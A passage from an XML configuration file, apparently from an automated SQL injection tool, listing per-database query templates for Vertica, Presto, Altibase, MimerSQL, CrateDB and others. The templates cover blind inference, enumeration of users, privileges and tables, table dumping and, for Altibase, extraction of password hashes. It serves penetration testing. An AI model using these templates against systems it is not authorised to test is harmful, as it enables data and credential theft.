query=\"SELECT schema_name FROM v_catalog.schemata\"/>\n            <blind query=\"SELECT DISTINCT(schema_name) FROM v_catalog.schemata ORDER BY 1 OFFSET %d LIMIT 1\" count=\"SELECT COUNT(DISTINCT(schema_name)) FROM v_catalog.schemata\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT schema_name,table_name FROM v_catalog.all_tables\" condition=\"schema_name\"/>\n            <blind query=\"SELECT table_name FROM v_catalog.all_tables WHERE schema_name='%s' OFFSET %d LIMIT 1\" count=\"SELECT COUNT(table_name) FROM v_catalog.all_tables WHERE schema_name='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT column_name,data_type FROM v_catalog.columns WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n            <blind query=\"SELECT column_name FROM v_catalog.columns WHERE table_name='%s' AND table_schema='%s'\" query2=\"SELECT data_type FROM v_catalog.columns WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'\" count=\"SELECT COUNT(column_name) FROM v_catalog.columns WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s ORDER BY %s\"/>\n            <blind query=\"SELECT %s FROM %s.%s ORDER BY %s OFFSET %d LIMIT 1\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT schema_name FROM v_catalog.schemata WHERE %s\" condition=\"schema_name\"/>\n            <blind query=\"SELECT DISTINCT(schema_name) FROM v_catalog.schemata WHERE %s ORDER BY 1\" count=\"SELECT COUNT(DISTINCT(schema_name)) FROM v_catalog.schemata WHERE %s\" condition=\"schema_name\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT schema_name,table_name FROM v_catalog.all_tables WHERE %s\" condition=\"table_name\" condition2=\"schema_name\"/>\n            <blind query=\"SELECT DISTINCT(schema_name) FROM v_catalog.all_tables WHERE %s ORDER BY 1\" query2=\"SELECT table_name FROM v_catalog.all_tables WHERE schema_name='%s'\" count=\"SELECT COUNT(DISTINCT(schema_name)) FROM v_catalog.all_tables WHERE %s\" count2=\"SELECT COUNT(table_name) FROM v_catalog.all_tables WHERE schema_name='%s'\" condition=\"table_name\" condition2=\"schema_name\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT table_schema,table_name FROM v_catalog.columns WHERE %s\" condition=\"column_name\" condition2=\"table_schema\" condition3=\"table_name\"/>\n            <blind query=\"SELECT DISTINCT(table_schema) FROM v_catalog.columns WHERE %s ORDER BY 1\" query2=\"SELECT DISTINCT(table_name) FROM v_catalog.columns WHERE table_schema='%s'\" count=\"SELECT COUNT(DISTINCT(table_schema)) FROM v_catalog.columns WHERE %s\" count2=\"SELECT COUNT(DISTINCT(table_name)) FROM v_catalog.columns WHERE table_schema='%s'\" condition=\"column_name\" condition2=\"table_schema\" condition3=\"table_name\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"Mckoi\">\n        <!-- NOTE: DBMS with minimalistic set of (restricted) features -->\n        <cast query=\"CONCAT('',%s)\"/>\n        <length query=\"LENGTH(%s)\"/>\n        <isnull query=\"IF(%s IS NULL,' ', %s)\"/>\n        <delimiter query=\"||\"/>\n        <limit/>\n        <limitregexp/>\n        <limitgroupstart/>\n        <limitgroupstop/>\n        <limitstring/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\";\"/>\n        <substring query=\"SUBSTRING((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (IF(%s,1,0))\"/>\n        <!-- NOTE: other way around does not work -->\n        <inference query=\"'%c'&lt;SUBSTRING((%s),%d,1)\"/>\n        <banner/>\n        <current_user/>\n        <current_db/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba/>\n        <dbs/>\n        <tables/>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s\"/>\n            <blind query=\"SELECT MIN(%s) FROM %s WHERE CONCAT('',%s)>'%s'\" query2=\"SELECT MAX(%s) FROM %s WHERE CONCAT('',%s) LIKE '%s'\" count=\"SELECT COUNT(*) FROM %s\" count2=\"SELECT COUNT(DISTINCT(%s)) FROM %s\"/>\n        </dump_table>\n        <users/>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <search_db/>\n        <search_table/>\n        <search_column/>\n   </dbms>\n\n    <dbms value=\"Presto\">\n        <cast query=\"CAST(%s AS VARCHAR(4000))\"/>\n        <length query=\"LENGTH(%s)\"/>\n        <isnull query=\"COALESCE(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"OFFSET %d LIMIT %d\"/>\n        <limitregexp query=\"\\s+OFFSET\\s+([\\d]+)\\s+LIMIT\\s+([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" OFFSET \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\"/>\n        <substring query=\"SUBSTR(%s,%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)\"/>\n        <hex query=\"TO_HEX(%s)\"/>\n        <inference query=\"CODEPOINT(SUBSTR((%s),%d,1))>%d\" dbms_version=\"&gt;=0.178\" query2=\"SUBSTR((%s),%d,1)>'%c'\"/>/>\n        <banner/>\n        <current_user query=\"CURRENT_USER\"/>\n        <current_db/>\n        <hostname/>\n        <table_comment query=\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'\"/>\n        <column_comment query=\"SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'\"/>\n        <is_dba/>\n        <check_udf/>\n        <users/>\n        <passwords/>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <dbs>\n            <inband query=\"SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA\"/>\n            <blind query=\"SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA ORDER BY 1 OFFSET %d LIMIT 1\" count=\"SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES\" condition=\"table_schema\"/>\n            <blind query=\"SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' OFFSET %d LIMIT 1\" count=\"SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n            <blind query=\"SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" query2=\"SELECT data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'\" count=\"SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s ORDER BY %s\"/>\n            <blind query=\"SELECT %s FROM %s.%s ORDER BY %s OFFSET %d LIMIT 1\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" condition=\"schema_name\"/>\n            <blind query=\"SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" count=\"SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" condition=\"schema_name\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s\" condition=\"table_name\" condition2=\"table_schema\"/>\n            <blind query=\"SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s\" query2=\"SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\" count=\"SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s\" count2=\"SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\" condition=\"table_name\" condition2=\"table_schema\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" condition=\"column_name\" condition2=\"table_schema\" condition3=\"table_name\"/>\n            <blind query=\"SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" query2=\"SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'\" count=\"SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" count2=\"SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'\" condition=\"column_name\" condition2=\"table_schema\" condition3=\"table_name\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"Altibase\">\n        <cast query=\"CAST(%s AS VARCHAR(4000))\"/>\n        <length query=\"LENGTH(%s)\"/>\n        <isnull query=\"NVL(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"LIMIT %d,%d\"/>\n        <limitregexp query=\"\\s+LIMIT\\s+([\\d]+)\\s*\\,\\s*([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" LIMIT \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\" query2=\"/*\"/>\n        <substring query=\"SUBSTR((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)\"/>\n        <hex query=\"HEX_ENCODE(%s)\"/>\n        <inference query=\"ASCII(SUBSTR((%s),%d,1))>%d\"/>\n        <banner query=\"SELECT PRODUCT_SIGNATURE FROM V$DATABASE\"/>\n        <current_user query=\"USER_NAME()\"/>\n        <current_db query=\"USER_NAME()\"/>\n        <hostname/>\n        <table_comment query=\"SELECT COMMENTS FROM SYSTEM_.SYS_COMMENTS_ WHERE USER_NAME='%s' AND TABLE_NAME='%s'\"/>\n        <column_comment query=\"SELECT COMMENTS FROM SYSTEM_.SYS_COMMENTS_ WHERE USER_NAME='%s' AND TABLE_NAME='%s' AND COLUMN_NAME='%s'\"/>\n        <is_dba query=\"(SELECT COUNT(*) FROM SYSTEM_.DBA_USERS_ WHERE USER_NAME=USER_NAME())=1\"/>\n        <users>\n            <inband query=\"SELECT USER_NAME FROM SYSTEM_.SYS_USERS_\"/>\n            <blind query=\"SELECT USER_NAME FROM SYSTEM_.SYS_USERS_ LIMIT %d,1\" count=\"SELECT COUNT(USER_NAME) FROM SYSTEM_.SYS_USERS_\"/>\n        </users>\n        <passwords>\n            <inband query=\"SELECT USER_NAME,PASSWORD FROM SYSTEM_.SYS_USERS_\" condition=\"USER_NAME\"/>\n            <blind query=\"SELECT PASSWORD FROM SYSTEM_.SYS_USERS_ WHERE USER_NAME='%s' LIMIT %d,1\" count=\"SELECT COUNT(PASSWORD) FROM SYSTEM_.SYS_USERS_ WHERE USER_NAME='%s'\"/>\n        </passwords>\n        <privileges>\n            <inband query=\"SELECT USER_NAME,PRIV_NAME FROM SYSTEM_.SYS_GRANT_OBJECT_ JOIN SYSTEM_.SYS_PRIVILEGES_ ON SYSTEM_.SYS_GRANT_OBJECT_.PRIV_ID=SYSTEM_.SYS_PRIVILEGES_.PRIV_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_GRANT_OBJECT_.GRANTEE_ID\" condition=\"USER_NAME\"/>\n            <blind query=\"SELECT PRIV_NAME FROM SYSTEM_.SYS_GRANT_OBJECT_ JOIN SYSTEM_.SYS_PRIVILEGES_ ON SYSTEM_.SYS_GRANT_OBJECT_.PRIV_ID=SYSTEM_.SYS_PRIVILEGES_.PRIV_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_GRANT_OBJECT_.GRANTEE_ID WHERE USER_NAME='%d' LIMIT %d,1\" count=\"SELECT COUNT(PRIV_NAME) FROM SYSTEM_.SYS_GRANT_OBJECT_ JOIN SYSTEM_.SYS_PRIVILEGES_ ON SYSTEM_.SYS_GRANT_OBJECT_.PRIV_ID=SYSTEM_.SYS_PRIVILEGES_.PRIV_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_GRANT_OBJECT_.GRANTEE_ID WHERE USER_NAME='%d'\"/>\n        </privileges>\n        <roles>\n            <inband query=\"SELECT GRANTEE.USER_NAME AS GRANTEE, USER_ROLE.USER_NAME AS GRANTED_ROLE FROM SYSTEM_.SYS_USER_ROLES_ JOIN SYSTEM_.SYS_USERS_ GRANTEE ON GRANTEE_ID=GRANTEE.USER_ID JOIN SYSTEM_.SYS_USERS_ USER_ROLE ON ROLE_ID=USER_ROLE.USER_ID\" condition=\"GRANTEE\"/>\n            <blind query=\"SELECT USER_ROLE.USER_NAME AS GRANTED_ROLE FROM SYSTEM_.SYS_USER_ROLES_ JOIN SYSTEM_.SYS_USERS_ GRANTEE ON GRANTEE_ID=GRANTEE.USER_ID JOIN SYSTEM_.SYS_USERS_ USER_ROLE ON ROLE_ID=USER_ROLE.USER_ID WHERE GRANTEE.USER_NAME='%s' LIMIT %d,1\" count=\"SELECT COUNT(*) FROM SYSTEM_.SYS_USER_ROLES_ JOIN SYSTEM_.SYS_USERS_ GRANTEE ON GRANTEE_ID=GRANTEE.USER_ID JOIN SYSTEM_.SYS_USERS_ USER_ROLE ON ROLE_ID=USER_ROLE.USER_ID WHERE GRANTEE.USER_NAME='%s'\"/>\n        </roles>\n        <statements/>\n        <dbs>\n            <inband query=\"SELECT USER_NAME FROM SYSTEM_.SYS_USERS_\"/>\n            <blind query=\"SELECT USER_NAME FROM SYSTEM_.SYS_USERS_ LIMIT %d,1\" count=\"SELECT COUNT(USER_NAME) FROM SYSTEM_.SYS_USERS_\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT USER_NAME,TABLE_NAME FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID\" condition=\"USER_NAME\"/>\n            <blind query=\"SELECT TABLE_NAME FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s' LIMIT %d,1\" count=\"SELECT COUNT(TABLE_NAME) FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT COLUMN_NAME,DATA_TYPE FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE TABLE_NAME='%s' AND USER_NAME='%s'\" condition=\"COLUMN_NAME\"/>\n            <blind query=\"SELECT COLUMN_NAME FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE TABLE_NAME='%s' AND USER_NAME='%s'\" query2=\"SELECT DATA_TYPE FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND USER_NAME='%s'\" count=\"SELECT COUNT(COLUMN_NAME) FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE TABLE_NAME='%s' AND USER_NAME='%s'\" condition=\"COLUMN_NAME\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s\"/>\n            <blind query=\"SELECT %s FROM %s LIMIT %d,1\" count=\"SELECT COUNT(*) FROM %s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT USER_NAME FROM SYSTEM_.SYS_USERS_ WHERE %s\" condition=\"USER_NAME\"/>\n            <blind query=\"SELECT DISTINCT(USER_NAME) FROM SYSTEM_.SYS_USERS_ WHERE %s\" count=\"SELECT COUNT(DISTINCT(USER_NAME)) FROM SYSTEM_.SYS_USERS_ WHERE %s\" condition=\"USER_NAME\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT USER_NAME,TABLE_NAME FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s\" condition=\"TABLE_NAME\" condition2=\"USER_NAME\"/>\n            <blind query=\"SELECT DISTINCT(USER_NAME) FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s\" query2=\"SELECT DISTINCT(TABLE_NAME) FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s'\" count=\"SELECT COUNT(DISTINCT(USER_NAME)) FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s\" count2=\"SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s'\" condition=\"TABLE_NAME\" condition2=\"USER_NAME\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT USER_NAME,TABLE_NAME FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s\" condition=\"COLUMN_NAME\" condition2=\"USER_NAME\" condition3=\"TABLE_NAME\"/>\n            <blind query=\"SELECT DISTINCT(USER_NAME) FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s\" query2=\"SELECT DISTINCT(TABLE_NAME) FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s'\" count=\"SELECT COUNT(DISTINCT(USER_NAME)) FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s\" count2=\"SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s'\" condition=\"COLUMN_NAME\" condition2=\"USER_NAME\" condition3=\"TABLE_NAME\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"MimerSQL\">\n        <!-- NOTE: DBMS with stohastic output of rows (ORDER BY required) -->\n        <!-- NOTE: NVARCHAR(4000) causes problems in boolean (e.g. 'Required temporary table row length is 32006, only 32000 is possible') -->\n        <cast query=\"CAST(%s AS NVARCHAR(1000))\"/>\n        <length query=\"CHAR_LENGTH(%s)\"/>\n        <isnull query=\"COALESCE(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"OFFSET %d FETCH %d\"/>\n        <limitregexp query=\"\\s+OFFSET\\s+([\\d]+)\\s+FETCH\\s+([\\d]+)\" query2=\"\\s+FETCH\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" OFFSET \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\"/>\n        <substring query=\"SUBSTRING((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)\"/>\n        <inference query=\"UNICODE_CODE(SUBSTRING((%s),%d,1))>%d\"/>\n        <banner query=\"SELECT attribute_value FROM SYSTEM.SERVER_INFO WHERE server_attribute='CATALOG_VERSION_CURRENT'\"/>\n        <current_user query=\"USER()\"/>\n        <current_db query=\"USER()\"/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"(SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE schema_owner=USER())>0\"/>\n        <check_udf/>\n        <!-- Reference: https://download.mimer.com/pub/developer/docs/html_110/Mimer_SQL_Engine_DocSet/App_D_Dic_tables2.html -->\n        <users>\n            <inband query=\"SELECT user_name FROM SYSTEM.USERS\"/>\n            <blind query=\"SELECT user_name FROM SYSTEM.USERS ORDER BY user_name OFFSET %d FETCH 1\" count=\"SELECT COUNT(user_name) FROM SYSTEM.USERS\"/>\n        </users>\n        <passwords/>\n        <privileges>\n            <inband query=\"SELECT DISTINCT user_name,privilege_type FROM SYSTEM.TABLE_PRIVILEGES JOIN SYSTEM.USERS ON SYSTEM.TABLE_PRIVILEGES.GRANTEE_SYSID=SYSTEM.USERS.USER_SYSID\" condition=\"user_name\"/>\n            <blind query=\"SELECT DISTINCT(privilege_type) FROM SYSTEM.TABLE_PRIVILEGES JOIN SYSTEM.USERS ON SYSTEM.TABLE_PRIVILEGES.GRANTEE_SYSID=SYSTEM.USERS.USER_SYSID WHERE user_name='%s' ORDER BY privilege_type OFFSET %d FETCH 1\" count=\"SELECT COUNT(DISTINCT(privilege_type)) FROM SYSTEM.TABLE_PRIVILEGES JOIN SYSTEM.USERS ON SYSTEM.TABLE_PRIVILEGES.GRANTEE_SYSID=SYSTEM.USERS.USER_SYSID WHERE user_name='%s'\"/>\n        </privileges>\n        <roles/>\n        <statements/>\n        <dbs>\n            <inband query=\"SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA\"/>\n            <blind query=\"SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA ORDER BY schema_name OFFSET %d FETCH 1\" count=\"SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES\" condition=\"table_schema\"/>\n            <blind query=\"SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' ORDER BY table_name OFFSET %d FETCH 1\" count=\"SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n            <blind query=\"SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s' ORDER BY column_name\" query2=\"SELECT data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'\" count=\"SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s\"/>\n            <blind query=\"SELECT %s FROM %s ORDER BY %s OFFSET %d FETCH 1\" count=\"SELECT COUNT(*) FROM %s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" condition=\"schema_name\"/>\n            <blind query=\"SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s ORDER BY schema_name\" count=\"SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" condition=\"schema_name\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s\" condition=\"table_name\" condition2=\"table_schema\"/>\n            <blind query=\"SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s ORDER BY table_schema\" query2=\"SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' ORDER BY table_name\" count=\"SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s\" count2=\"SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\" condition=\"table_name\" condition2=\"table_schema\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" condition=\"column_name\" condition2=\"table_schema\" condition3=\"table_name\"/>\n            <blind query=\"SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s ORDER BY table_schema\" query2=\"SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' ORDER BY table_name\" count=\"SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" count2=\"SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'\" condition=\"column_name\" condition2=\"table_schema\" condition3=\"table_name\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"CrateDB\">\n        <cast query=\"CAST(%s AS TEXT)\"/>\n        <length query=\"CHAR_LENGTH((%s)::text)\"/>\n        <isnull query=\"COALESCE(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"LIMIT %d OFFSET %d\"/>\n        <limitregexp query=\"\\s+LIMIT\\s+([\\d]+)\\s+OFFSET\\s+([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"2\"/>\n        <limitgroupstop query=\"1\"/>\n        <limitstring query=\" LIMIT \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <!-- NOTE: non-; version(s) doesn't work properly -->\n        <comment query=\";--\" query2=\";/*\"/>\n        <substring query=\"SUBSTR((%s)::text,%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)\"/>\n        <!-- NOTE: ASCII() only available in >= 4.1 -->\n        <inference query=\"SUBSTR((%s)::text,%d,1)>'%c'\" query2=\"ASCII(SUBSTR((%s)::text,%d,1))>%d\"/>\n        <banner query=\"SELECT version['number'] FROM sys.nodes\" query2=\"VERSION()\"/>\n        <current_user query=\"CURRENT_USER\"/>\n        <current_db query=\"CURRENT_SCHEMA()\"/>\n        <hostname query=\"SELECT hostname FROM sys.nodes\"/>\n        <!--<table_comment query=\"SELECT pg_catalog.obj_description(c.oid) FROM pg_catalog.pg_class c 